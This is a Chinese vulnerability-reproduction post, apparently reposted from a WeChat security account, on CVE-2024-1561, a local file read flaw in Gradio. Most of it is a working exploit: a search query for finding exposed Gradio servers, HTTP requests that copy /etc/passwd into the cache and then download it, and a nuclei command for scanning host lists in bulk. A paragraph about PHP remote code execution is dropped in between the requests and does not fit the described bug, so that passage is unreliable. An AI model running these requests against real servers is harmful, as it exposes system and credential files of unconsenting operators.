文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!
一:漏洞名称
Gradio应用程序-本地文件读取漏洞
二:漏洞描述
该漏洞存在于Gradio应用程序中的/component_server端点中。此端点缺乏适当的授权检查,使得攻击者可以使用任意参数调用Component类上的任何方法。恶意参与者可以通过将目标指向基础Block类的move_resource_to_block_cache方法来利用此漏洞。
三:漏洞影响版本
gradio
四:网络空间测绘查询
body="__gradio_mode__"
五:漏洞复现
请求/config文件获取componets的id
POST /component_server HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
PHP 中,传入代码执行或命令执行等危险函数的参数,客户端可控,同时针对该参数没有做过滤或过滤不足,导致代码执行或命令执行。通过远程访问方式传参,就叫做RCE。
GET /file=/tmp/gradio/5160dcbcc73a9d0876e3ada9ca4c95f2d7c63bb5/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip
nuclei.exe -t POCCVE-2024-1561.yaml -l POChost.txt
建议更新当前系统或软件至最新版,完成漏洞的修复。
原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-1561
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论